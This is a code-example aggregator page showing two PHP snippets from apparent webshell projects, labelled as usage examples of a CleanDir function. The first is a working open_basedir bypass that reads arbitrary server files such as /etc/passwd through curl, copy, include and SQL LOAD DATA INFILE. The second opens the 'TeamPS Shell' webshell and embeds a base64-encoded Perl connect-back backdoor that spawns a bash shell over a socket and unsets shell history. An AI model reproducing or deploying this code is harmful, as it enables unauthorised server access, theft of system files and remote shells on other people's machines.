PHP CleanDir примеры использования

Пример #1

Файл: shellzx.php Проект: Theov/webshells

function security_bypass()
{
    if (isset($_POST['curl_bypass'])) {
        $ch = curl_init("file://{$_POST['file_bypass']}");
        curl_setopt($ch, CURLOPT_HEADERS, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $file_out = curl_exec($ch);
        curl_close($ch);
        echo "<textarea rows='20' cols='150' readonly>" . htmlspecialchars($file_out) . "</textarea></br></br>";
    } elseif (isset($_POST['tmp_bypass'])) {
        tempnam("/home/", $_POST['file_passwd']);
    } elseif (isset($_POST['copy_bypass'])) {
        if (@copy($_POST['file_bypass'], $_POST['dest'])) {
            echo "File successfully copied!</br>";
            @($fh = fopen($_POST['dest'], 'r'));
            echo "<textarea rows='20' cols='150' readonly>" . htmlspecialchars(@fread($fh, filesize($_POST['dest']))) . "</textarea></br></br>";
            @fclose($fh);
        } else {
            echo "Failed to copy file</br>";
        }
    } elseif (isset($_POST['include_bypass'])) {
        if (file_exists($_POST['file_bypass'])) {
            echo "<textarea rows='20' cols='150' readonly>";
            @(include $_POST['file_bypass']);
            echo "</textarea>";
        }
    } elseif (isset($_POST['sql_bypass'])) {
        extract($_SESSION);
        $conn = mysql_connect($mhost . ":" . $mport, $muser, $mpass);
        if ($conn) {
            mysql_select_db($_POST['sql_db']);
            mysql_query("CREATE TABLE `{$_POST['tmp_table']}` (`File` TEXT NOT NULL);");
            mysql_query("LOAD DATA INFILE \"{$_POST['sql_file']}\" INTO TABLE {$_POST['tmp_table']}") or die(mysql_error());
            $res = mysql_query("SELECT * FROM {$_POST['tmp_table']}");
            if (mysql_num_rows($res) < 1) {
                die("Failed to retrieve file contents!");
            }
            if ($res) {
                while ($row = mysql_fetch_array($res)) {
                    $f .= "{$row['0']}</br>";
                }
                echo $f;
            }
            mysql_query("DROP TABLE {$_POST['tmp_table']}");
        }
    }
    echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>\n    <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>\n    <tr><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>\n    <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>\n    <tr><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='" . CleanDir(getcwd()) . "/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='{$self}?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>\n    <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>\n    <tr><td colspan='2'><form action='{$self}?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>\n    </table>";
}

Пример #2

Файл: teamps.php Проект: xijbx/teamps-shell

<?php

//TeamPS Shell
//By Plum & KrypTiK
error_reporting(0);
#chdir('');
//Some basic var's
if (!@$_GET['path']) {
    $dir = CleanDir(getcwd());
} else {
    $dir = CleanDir($_GET['path']);
}
$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
$domain = $_SERVER['HTTP_HOST'];
$script = $_SERVER['SCRIPT_NAME'];
$full_url = $_SERVER['REQUEST_URI'];
$script2 = basename($script);
$serverip = $_SERVER['SERVER_ADDR'];
$userip = $_SERVER['REMOTE_ADDR'];
$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
$disabled = ini_get('disable_functions');
//Perl back connect script by LorD
//Encoded in base64 for convenience
$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
@ini_set("memory_limit", "9999M");
@ini_set("max_execution_time", "0");
@ini_set("upload_max_filesize", "9999m");
@ini_set("magic_quotes_gpc", "0");
@set_magic_quotes_runtime(0);
set_time_limit(0);